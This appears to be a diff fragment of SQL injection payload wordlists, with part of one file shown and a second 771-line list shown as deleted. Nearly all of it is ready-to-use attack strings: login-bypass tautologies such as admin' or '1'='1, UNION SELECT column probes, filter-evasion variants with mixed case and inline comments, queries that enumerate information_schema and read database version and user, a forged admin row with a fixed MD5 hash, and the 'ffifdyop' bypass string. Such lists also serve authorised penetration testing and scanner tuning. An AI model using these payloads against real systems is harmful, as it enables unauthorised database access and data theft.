') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
